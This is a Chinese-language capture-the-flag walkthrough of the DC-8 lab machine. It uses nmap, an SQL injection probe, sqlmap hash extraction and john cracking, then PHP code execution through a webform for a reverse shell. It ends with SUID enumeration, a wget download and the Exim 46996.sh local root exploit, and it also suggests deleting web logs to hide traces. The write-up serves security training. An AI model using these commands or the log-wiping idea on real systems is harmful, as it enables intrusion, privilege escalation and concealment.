【渗透测试】DC-8提权靶机综合渗透教程

admin 2024年11月15日11:00:42评论14 views字数 2609阅读8分41秒阅读模式
~ 精诚所至,金石为开 ~

前言

【重要通知】关于举办第二届CN-fnst::CTF的通知

讲解了DC-8提权靶机的通关教程,比较基础,适合刚入门不久的师傅们,以及searchsploitsqlmapjohnnmap工具的使用,以及SUID的特性。

靶机下载,由于官网下太慢了,用夸克:

https://pan.quark.cn/s/efe0be139167

靶机复现

配置好net网卡

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114112949493

nmap主机探测

nmap -sP 192.168.209.0/24
【渗透测试】DC-8提权靶机综合渗透教程
image-20241114113606201

端口扫描

nmap 192.168.209.139
【渗透测试】DC-8提权靶机综合渗透教程
image-20241114170433946

访问80端

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114113646727

随便点点

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114113727856

注入payload,sql语句错误,存在sql注入漏洞

' and 1=1 --+
【渗透测试】DC-8提权靶机综合渗透教程
image-20241114113742359

目录扫描,到 robots.txt

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114170716727

访问有个user/login

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114130333453

sqlmap的payload

sqlmap -u 'http://192.168.209.139/?nid=1' -p nid -D d7db --tables
【渗透测试】DC-8提权靶机综合渗透教程
image-20241114125637560

得到两个用户的hash密码, john 暴力破解

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114125744289

得到第二行的密码

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114125704689

登录

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114172009687

这里有一个联系我们,提交一下看看

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114135907528

看到了提交成功后的内容

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114135921448

点击这里有个Webform

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114172326556

找到Form settings,并修改PHP code

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114141833277

但是遇到个问题,修改后,这里没有直接输出我echo的内容

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114141904617

直到我添加了一个标签

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114141941166

就正常输出了,证明了可以执行php代码,那么就可以反弹shell

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114142024204

打开谷歌插件,HackTools,复制反弹shell命令,当然没有的话,小羽我已经给你们准备好了

白小羽

下载链接:【渗透测试】16个实用谷歌浏览器插件分享

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114142204814

复制粘贴到命令执行函数中就好

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114142715929

攻击机开启监听

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114142550415

反弹四百

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114142609786

尝试nc

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114142842355
【渗透测试】DC-8提权靶机综合渗透教程
image-20241114142856535

创建一个交互式终端

python -c 'import pty; pty.spawn("/bin/bash")'
【渗透测试】DC-8提权靶机综合渗透教程
image-20241114143457238

查找具有SUID的文件

白小羽

SUID:当一个可执行文件被设置了SUID权限后,该文件将以文件所有者的权限而不是执行者的权限来运行。(仅执行,不包括修改)

find / -perm -4000 -print 2>/dev/null
【渗透测试】DC-8提权靶机综合渗透教程
image-20241114145701296

这个命令的各个部分解释如下:

  • find /:从根目录/开始搜索。
  • -perm -4000:查找具有SUID权限的文件。SUID权限允许用户以文件所有者的权限执行该文件,而不是以用户自己的权限执行。这里的-4000表示设置用户ID位(SUID位)。
  • -print:将找到的文件路径打印到标准输出。这实际上是find命令的默认行为,所以-print可以省略。
  • 2>/dev/null:将标准错误(文件描述符2)重定向到/dev/null。这意味着如果find命令在执行过程中遇到任何错误(比如权限不足无法访问某个目录),这些错误信息将不会被显示。

在Linux系统中,/sbin文件夹通常包含了一系列系统管理员使用的可执行命令,那么就可以直接利用这命令/软件,来提权

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114150946994

查找版本,为4.89

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114151049742

查找漏洞,Privilege Escalation权限提升,编号 46996.sh

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114152218458

搜索编号

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114152758146

将这个paload文件复制到 /data下面

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114152735814

用python开启服务器

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114153034977

当前文件夹没有写权限,下载不了

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114153441974

我们返回根目录,查看文件夹权限,发现一个其他用户具有写权限的目录

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114153503724

切换到/tmp目录下,下载文件

wget http://192.168.209.137:8888/46996.sh
【渗透测试】DC-8提权靶机综合渗透教程
image-20241114153529081

下载成功,附加执行权限,默认没有执行权限的

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114160851896

查看这个46996.sh文件提示,包含了使用过程

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114160223761

执行提权脚本

./46996.sh -m netcat
【渗透测试】DC-8提权靶机综合渗透教程
image-20241114154205254

提权成功

【渗透测试】DC-8提权靶机综合渗透教程
image-20241114154121768

还感兴趣的,可以继续深入,把网站的请求日志文件内容删除,以及其他的隐蔽方式,时间比较有限,就不做讲解了,后续深入

往期推荐

【渗透测试】DC-3提权靶机综合渗透教程

DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程

DC-1综合渗透从外网打到内网,msf后渗透,权限提升,入侵痕迹清除

upload-labs通关全教程(建议萌新收藏)Web安全-文件上传漏洞超详细解析

开箱即用!265种windows渗透工具合集--灵兔宝盒

原文始发于微信公众号(泷羽Sec):【渗透测试】DC-8提权靶机综合渗透教程

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月15日11:00:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【渗透测试】DC-8提权靶机综合渗透教程https://cn-sec.com/archives/3396088.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息